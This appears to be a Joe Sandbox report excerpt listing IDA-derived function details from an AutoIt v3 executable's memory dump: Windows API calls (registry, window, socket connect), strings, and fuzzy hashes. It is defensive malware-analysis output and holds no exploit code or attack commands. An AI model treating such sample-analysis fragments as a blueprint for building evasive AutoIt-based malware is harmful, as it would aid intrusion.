Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 4e58fefe68e082a0caf14795948b734d19d564f3cca129fe0458dcf847f9794e
Instruction ID: a5e475a74e7166b099023aae5f23696051653ae522c707915d370c741d8e35dc
Opcode Fuzzy Hash: 4e58fefe68e082a0caf14795948b734d19d564f3cca129fe0458dcf847f9794e
Instruction Fuzzy Hash: 2191BC71A10349EBCB24EFA6CC44FAEBBB8EF44710F149119F915AB281D7709946CBB0

Function 00DAEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00DAEADA,?,?), ref: 00DAEB27
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00DAEADA,?,?), ref: 00E04B26
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00DAEADA,?,?), ref: 00E04B65
RegCloseKey.ADVAPI32(?,?,00DAEADA,?,?), ref: 00E04B94

Strings

Software\AutoIt v3\AutoIt, xrefs: 00DAEB1D
Include, xrefs: 00E04B1E, 00E04B5D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 37f04dfc1c977685d48c7921e8e6291a613e6453cff41a13253d39242d08c1d1
Instruction ID: e3882794de7bb37dddb63839555597d9dd139b0efe7579b7a8d09c5203a93fbf
Opcode Fuzzy Hash: 37f04dfc1c977685d48c7921e8e6291a613e6453cff41a13253d39242d08c1d1
Instruction Fuzzy Hash: B8116DB1604218BEEF04AFA4DD86EFE77BCEF04344F005059B606E2091EA709E45DB60

Function 00D92E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D92ECB
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D92EEC
ShowWindow.USER32(00000000), ref: 00D92F00
ShowWindow.USER32(00000000), ref: 00D92F09

Strings

AutoIt v3, xrefs: 00D92EC3, 00D92EC8, 00D92EC9
edit, xrefs: 00D92EE6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: fcf911552d1d01ecc721806c5e9412c3f41b52788fc5cc7d70142223fddf06c5
Instruction ID: 48eefef200cae888eff446bb69960ef57d20fd0f4c03933ecee693a58d41d35f
Opcode Fuzzy Hash: fcf911552d1d01ecc721806c5e9412c3f41b52788fc5cc7d70142223fddf06c5
Instruction Fuzzy Hash: 36F01770A483A07EE7215B63AC08FAB2E7DD7C6F21F01455ABA08B21A0C1610889CAB0

Function 00DB87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00DB87D7

Part of subcall function 00DB1E5A: __initp_misc_winsig.LIBCMT ref: 00DB1E7E
Part of subcall function 00DB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DB8BE1
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DB8BF5
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DB8C08
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DB8C1B
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DB8C2E
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DB8C41
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DB8C54
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00DB8C67
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DB8C7A
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DB8C8D
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DB8CA0
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DB8CB3
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DB8CC6
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DB8CD9
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DB8CEC
Part of subcall function 00DB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DB8CFF

__mtinitlocks.LIBCMT ref: 00DB87DC

Part of subcall function 00DB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4AC68,00000FA0,?,?,00DB87E1,00DB6AFA,00E467D8,00000014), ref: 00DB8AD1

__mtterm.LIBCMT ref: 00DB87E5

Part of subcall function 00DB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00DB89CF
Part of subcall function 00DB884D: _free.LIBCMT ref: 00DB89D6
Part of subcall function 00DB884D: RtlDeleteCriticalSection.NTDLL(00E4AC68), ref: 00DB89F8

__calloc_crt.LIBCMT ref: 00DB880A
GetCurrentThreadId.KERNEL32 ref: 00DB8833

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: c66745c9b44761532783ed0271b77cfbe5d70e7ae4980d677ba48a947efdd6b8
Instruction ID: f929edf366445c0002090d1ab61c2ecb77a82d65910af09a51ea00913f046025
Opcode Fuzzy Hash: c66745c9b44761532783ed0271b77cfbe5d70e7ae4980d677ba48a947efdd6b8
Instruction Fuzzy Hash: 50F09036119751DEF2647B39BC07ACA26CCCF06B34B680A2AF467D50D2FF108841E174

Function 00DD6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00D93B1E: _wcsncpy.LIBCMT ref: 00D93B32

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DD6DBA
GetLastError.KERNEL32 ref: 00DD6DC5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6DD9
_wcsrchr.LIBCMT ref: 00DD6DFB

Part of subcall function 00DD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6E31

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 553e243c5c96eb71ebf9f36bd83d6249266039fd32d6c9d6fc3b2a0a9172d0b9
Instruction ID: 7033dba8353c91f63f1c0242e4ec614ddb4e885c78efc0bb6684a2a72a382f8c
Opcode Fuzzy Hash: 553e243c5c96eb71ebf9f36bd83d6249266039fd32d6c9d6fc3b2a0a9172d0b9
Instruction Fuzzy Hash: EB2127756413189ADF207BB8EC4AAEA33ACCF11310F244557F021D32E2EB20DE8496B0

Function 00DE9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DEACD3: inet_addr.WS2_32(00000000), ref: 00DEACF5

socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00DE9160
WSAGetLastError.WS2_32(00000000), ref: 00DE916F
connect.WS2_32(00000000,?,00000010), ref: 00DE918B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: f487ff5d25345992b2a9c9162c11fb571c91de9a7a9fca92e1fd0e44fb19d907
Instruction ID: 77f4dc9c5a3b4f20ac5a88ea03d3cc44cb9f801c9f9cadacdcb7a91f2ceef320
Opcode Fuzzy Hash: f487ff5d25345992b2a9c9162c11fb571c91de9a7a9fca92e1fd0e44fb19d907
Instruction Fuzzy Hash: 5A21A1312042119FCB00BF69CC99B6EB7ADEF45724F04841AF916AB3D1DB70E8058771

Function 00DEF79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

dE, xrefs: 00DEF865

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID: dE
API String ID: 0-1919509572
Opcode ID: 1ca16384eedf0f3b7b72c37c549fab7f8b66a26e54134c510ec8b56f9ba5464c
Instruction ID: 64630182d2e725b9ad88db1527169282c3036bbaa9ebc3f11bfb165519a500e9
Opcode Fuzzy Hash: 1ca16384eedf0f3b7b72c37c549fab7f8b66a26e54134c510ec8b56f9ba5464c
Instruction Fuzzy Hash: AAF17D716087419FC710EF25C880B5AB7E5FF88314F14896EF9999B292D730E905CBA2

Function 00D93DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00D93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D934E2,?,00000001), ref: 00D93FCD

_free.LIBCMT ref: 00E03C27
_free.LIBCMT ref: 00E03C6E

Part of subcall function 00D9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E522E8,?,00000000,?,00D93E2E,?,00000000,?,00E2DBF0,00000000,?), ref: 00D9BE8B
Part of subcall function 00D9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D93E2E,?,00000000,?,00E2DBF0,00000000,?,00000002), ref: 00D9BEA7
Part of subcall function 00D9BDF0: __wsplitpath.LIBCMT ref: 00D9BF19
Part of subcall function 00D9BDF0: _wcscpy.LIBCMT ref: 00D9BF31
Part of subcall function 00D9BDF0: _wcscat.LIBCMT ref: 00D9BF46
Part of subcall function 00D9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D9BF56

Strings

Bad directive syntax error, xrefs: 00E03C54
>>>AUTOIT SCRIPT<<<, xrefs: 00E03A01

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 1510338132-1757145024
Opcode ID: e8740eb1c398e3a5cc95d1241dc7368525a0615cab10808fff4bee21972fd3d2
Instruction ID: 5f72bc74d4fc266e0a509b15eff0e7e740f049ceadc39095bfad8fdd75071936
Opcode Fuzzy Hash: e8740eb1c398e3a5cc95d1241dc7368525a0615cab10808fff4bee21972fd3d2
Instruction Fuzzy Hash: B1912B71A10219AFCF04EFA8D8919EEB7B8FF05314F14452AF416BB291DB74AA45CB70

Function 00DB413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00DB418E

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00DB41C9
__wopenfile.LIBCMT ref: 00DB41D9

Strings

<G, xrefs: 00DB415D, 00DB4180, 00DB418C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 361a0d5a3e130a70c2a8d1f53d109212548a199b9cb3b77f2cec917a26556884
Instruction ID: 87b983d39693e8cb3050ff625e588fef06c987e85592e9e32a6e6103feab121f
Opcode Fuzzy Hash: 361a0d5a3e130a70c2a8d1f53d109212548a199b9cb3b77f2cec917a26556884
Instruction Fuzzy Hash: F911C670D00316EBDB11FFB89C426EF3BA4EF553A0B188525A417DB282EB74C981A771

Function 00DAC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DAC948,SwapMouseButtons,00000004,?), ref: 00DAC979
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00DAC948,SwapMouseButtons,00000004,?,?,?,?,00DABF22), ref: 00DAC99A
RegCloseKey.KERNEL32(00000000,?,?,00DAC948,SwapMouseButtons,00000004,?,?,?,?,00DABF22), ref: 00DAC9BC

Strings

Control Panel\Mouse, xrefs: 00DAC977

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: dc9cdddfe78bb776016aff172261a2d3fc2b68ba0a9fa78eac925d4ac60a63ff
Instruction ID: 9560da828fcb710f2b792c74df554501ed723dc93be239e60c1df79306131cf3
Opcode Fuzzy Hash: dc9cdddfe78bb776016aff172261a2d3fc2b68ba0a9fa78eac925d4ac60a63ff
Instruction Fuzzy Hash: 1B117C76525208FFDB118F64DC44EEF77B8EF09751F00941AB841E7210E2319E449B60

Function 00DCA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4604657f9b063bca1ac3ca825bcd1c8b27c27c5f8b05def6d61c9404b202a60
Instruction ID: 6e0ce85a2ef39c09bfab3c5fa37f45ca9065c6dfd14759292c26f980936824e0
Opcode Fuzzy Hash: a4604657f9b063bca1ac3ca825bcd1c8b27c27c5f8b05def6d61c9404b202a60
Instruction Fuzzy Hash: 7AC13A75A0021AEBCB14CFA8C984FAEB7B6FF48708F144599E905EB251D730DE41CBA1

Function 00DDCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00D941A7: _fseek.LIBCMT ref: 00D941BF

Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF49
Part of subcall function 00DDCE59: _wcscmp.LIBCMT ref: 00DDCF5C

_free.LIBCMT ref: 00DDCDC9
_free.LIBCMT ref: 00DDCDD0
_free.LIBCMT ref: 00DDCE3B

Part of subcall function 00DB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DB8715,00000000,00DB88A3,00DB4673,?), ref: 00DB28DE
Part of subcall function 00DB28CA: GetLastError.KERNEL32(00000000,?,00DB8715,00000000,00DB88A3,00DB4673,?), ref: 00DB28F0

_free.LIBCMT ref: 00DDCE43

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction ID: d5289ee738b974725c6588dc57b85e74b34bfec4949ed8af7ad667f1abc52a9f
Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
Instruction Fuzzy Hash: 1A512AB1914219AFDF159F64CC81AAEBBB9EF48300F1040AEF659A3251DB715A80CF79

Function 00D91E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D91E87

Part of subcall function 00D938E4: _memset.LIBCMT ref: 00D93965
Part of subcall function 00D938E4: _wcscpy.LIBCMT ref: 00D939B5
Part of subcall function 00D938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D939C6

KillTimer.USER32(?,00000001), ref: 00D91EDC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D91EEB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04526

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 9a83286211a12171f8eceb6f72a7a7167ece571c00214de63614a3712a957464
Instruction ID: 622086f37f83c395fd2b2e22d5e4aa1efe881c343f729c2fddc855c675f137f6
Opcode Fuzzy Hash: 9a83286211a12171f8eceb6f72a7a7167ece571c00214de63614a3712a957464
Instruction Fuzzy Hash: D821A7F5504794AFEB329B258C55BEBBBEC9B05308F04008DE79E662C1C7745A88CB61

Function 00DE92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6

gethostbyname.WS2_32(?), ref: 00DE92F0
WSAGetLastError.WS2_32(00000000), ref: 00DE92FB
_memmove.LIBCMT ref: 00DE9328
inet_ntoa.WS2_32(?), ref: 00DE9333

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

